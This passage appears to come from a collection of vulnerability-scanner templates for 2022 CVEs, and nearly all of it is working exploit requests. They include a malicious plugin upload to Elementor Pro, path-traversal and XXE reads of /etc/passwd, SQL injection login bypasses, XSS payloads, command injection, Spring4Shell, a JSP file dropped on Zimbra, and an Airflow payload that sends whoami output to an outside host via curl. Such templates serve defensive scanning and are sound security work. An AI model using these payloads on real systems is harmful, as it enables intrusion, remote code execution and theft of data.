HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper < 12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n"],"payloads":{"xss_payload":["<form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<form><math><img onerror=alert(document.domain) src=1><mtext>","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-31982","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n","HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(header_1, 'wordpress_')","contains(header_1, 'Location')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 != 302"]}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site 